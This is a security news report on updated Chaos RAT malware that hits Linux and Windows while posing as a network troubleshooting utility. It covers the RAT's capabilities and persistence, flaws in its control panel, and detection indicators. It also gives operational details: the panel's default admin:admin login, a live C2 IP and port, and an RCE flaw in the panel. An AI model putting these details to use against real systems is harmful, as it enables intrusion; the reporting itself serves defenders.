New Chaos RAT Targets Linux and Windows Users to Steal Sensitive Data
A new wave of cyber threats has emerged with the discovery of updated variants of Chaos RAT, a notorious open-source remote administration tool (RAT) first identified in 2022.
As reported by Acronis TRU researchers in their recent 2025 analysis, this malware continues to evolve, targeting both Linux and Windows environments with sophisticated capabilities for espionage and data exfiltration.
Cross-Platform Malware on the Rise
Written in Golang, Chaos RAT leverages cross-platform compatibility, enabling attackers to deploy payloads across diverse systems with relative ease.
Its latest iterations, spotted in real-world attacks, disguise themselves as legitimate network troubleshooting utilities, particularly for Linux users, luring unsuspecting victims into downloading malicious payloads such as the recently analyzed “NetworkAnalyzer.tar.gz” file submitted from India on VirusTotal.
Chaos RAT’s architecture reveals a highly flexible and dangerous toolset. Its administrative panel, accessible via a browser at http://localhost:8080 with default credentials (admin:admin), provides attackers with a dashboard to build 64-bit payloads, manage compromised clients, and execute commands.
The RAT supports a wide array of functions, including system information gathering (via the “getos” command), screenshot capture using the kbinani/screenshot library, and file manipulation through upload, download, and delete operations.
Communication with its command-and-control (C2) server is secured with Base64-encoded configurations and JSON Web Tokens (JWTs) for authentication, as seen in recent samples with embedded IP addresses like 176.65.141.63 and ports such as 5223.
Exploiting Vulnerabilities
Moreover, a critical vulnerability (CVE-2024-30850) in its web panel allows remote code execution on the server itself, a flaw exploited to humorous effect by security researcher Chebuya, who tricked the panel into playing Rick Astley’s “Never Gonna Give You Up.”
This vulnerability, compounded by an XSS issue (CVE-2024-31839), underscores the dual-edged nature of Chaos RAT as both a tool for attackers and a potential target for counter-exploitation.
Its open-source availability on GitHub, last updated in October 2024, further amplifies the risk, as threat actors can customize it to evade detection, blending into cybercrime noise and complicating attribution tactics often seen with APT groups like APT41 and APT10 using similar RATs.
The malware’s persistence mechanisms, such as modifying /etc/crontab in Linux for scheduled payload updates, and its ability to operate stealthily on Windows with hidden execution options, make it a potent threat for establishing footholds in ransomware campaigns.
Acronis Cyber Protect Cloud detects these variants as “Trojan.Linux.ChaosRAT.A,” and their EDR solution now supports Linux environments like Ubuntu 22.04, mapping threats to the MITRE ATT&CK framework for actionable remediation.
As Chaos RAT continues to target sensitive data across platforms, defenders must remain vigilant, leveraging indicators of compromise (IOCs) and YARA rules provided by Acronis to bolster detection and mitigation efforts.
Indicators of Compromise (IOCs)
| Type | Value |
|---|---|
| SHA256 | 1e074d9dca6ef0edd24afb2d13ca4429def5fc5486cd4170c989ef60efd0bbb0 |
| SHA256 | a51416ea472658b5530a92163e64cfa51f983dfabe3da38e0646e92fb14de191 |
| YARA Rule | ELF_Chaos_RAT (Detects Linux ELF binaries <10MB with CHAOS-RAT indicators) |
To Upgrade Your Cybersecurity Skills, Take Diamond Membership With 150+ Practical Cybersecurity Courses Online – Enroll Here
Source link
